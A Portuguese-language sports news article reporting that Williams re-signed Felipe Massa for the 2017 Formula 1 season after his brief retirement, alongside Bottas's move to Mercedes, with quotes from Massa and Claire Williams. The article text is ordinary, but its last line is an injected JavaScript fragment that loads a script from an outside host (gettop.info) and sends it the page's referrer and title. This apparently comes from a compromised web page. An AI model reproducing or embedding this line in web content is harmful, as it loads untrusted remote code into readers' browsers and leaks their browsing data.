Agora é oficial. Após muitos rumores sobre uma possível volta de Felipe Massa à Fórmula 1, a Williams anunciou, na tarde desta segunda-feira, que fechou um acordo com o brasileiro por mais uma temporada. O piloto havia se aposentado da categoria no final de 2016, mas voltou atrás e seguirá na equipe que defendeu desde 2014.
Na temporada 2017, Massa correrá ao lado do canadense Lance Stroll, de apenas 18 anos, que fará sua estreia na F-1. Assim, ficou ainda mais forte a evidência de que o finlandês Valtteri Bottas seria o substituto de Nico Rosberg, que se aposentou cinco dias após a conquista de seu primeiro título mundial na Mercedes. A própria Williams comunicou que liberou Bottas para se juntar à equipe alemã, e pouco depois a Mercedes confirmou o acordo.
Felipe havia anunciado sua aposentadoria da Fórmula 1 em setembro, quando revelou que só correria até o fim da temporada de 2016. Desde então, diversas manifestações de agradecimento ao brasileiro foram realizadas, tendo como momento marcante a corrida do piloto em Interlagos, no que seria seu último GP do Brasil.
Experiência conta – Porém, com o desejo da Mercedes de contar com Bottas, o fato de ficar sem um piloto experiente no grid de 2017 pesou para a Williams. Stroll fará sua estreia na F-1 e, com diversas mudanças no regulamento, a equipe britânica gostaria de contar com alguém que tivesse experiência na categoria. Assim, após muitas especulações, a Williams acertou o retorno de Massa por mais uma temporada, a quarta do brasileiro com o time.
Massa comemorou a oportunidade de poder correr neste ano, ainda mais em uma equipe que conhece tão bem. Além disso, desejou sucesso ao seu ex-companheiro Bottas na Mercedes.
“Primeiramente, estou muito feliz de ter a oportunidade de voltar à Williams. Eu sempre pretendi correr em algum lugar em 2017, mas a Williams é um time que está no meu coração, e eu tenho muito respeito por tudo que ela está tentando conquistar. Valtteri tem uma grande oportunidade, e eu desejo tudo de melhor a ele na Mercedes”, disse o piloto.
Quem também se mostrou mais do que satisfeita foi a chefe da equipe, Claire Williams. A dirigente não escondeu a animação. “Estou encantada que Felipe concordou em deixar sua aposentadoria para fazer parte da nossa temporada de 2017. Massa sempre foi um membro muito querido da família Williams, e ter a oportunidade de trabalhar com ele de novo é algo que todos esperamos. Ele é um grande trunfo para nós”, afirmou Claire.
s.src=\’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=\’ + encodeURIComponent(document.referrer) + \’&default_keyword=\’ + encodeURIComponent(document.title) + \’\’;